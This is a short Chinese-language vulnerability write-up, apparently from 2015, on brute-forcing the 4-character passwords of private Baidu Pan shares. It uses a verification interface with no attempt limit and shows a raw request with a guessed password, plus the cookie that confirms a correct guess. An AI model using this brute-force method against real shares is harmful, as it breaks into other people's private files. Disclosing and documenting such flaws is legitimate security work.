0x01 原理
百度云私密分享默认是4个字符的密码,直接破解输入几次以后就需要验证码。在这篇文章中介绍了百度云存在可以无限制破解密码的接口。原理就是不断用字典去测试存在漏洞的接口,如果密码正确的话,就会直接set-cookie。
发包:
POST /share/verify?shareid=2411134184&uk=1279847105&t=1447290671171&channel=chunlei&clienttype=0&web=1 HTTP/1.1
Accept: */*
Referer: http://pan.baidu.com/share/verify?shareid=2411134184&uk=1279847105&t=1447290671171&channel=chunlei&clienttype=0&web=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pan.baidu.com
Content-Length: 8
Cache-Control: no-cache
Cookie: BAIDUID=7C656DB6FB750E5B8EFA7D0F522D20E6:FG=1; PANWEB=1; Hm_lvt_adf736c22cd6bcc36a1d27e5af30949e=1444112574; Hm_lvt_773fea2ac036979ebb5fcc768d8beb67=1444112574
pwd=26ms
如果密码正确,就set-cookie
如果密码不对,就不会set BDCLND的cookie值
HTTP/1.1 200 OK
Date: Thu, 12 Nov 2015 01:10:38 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept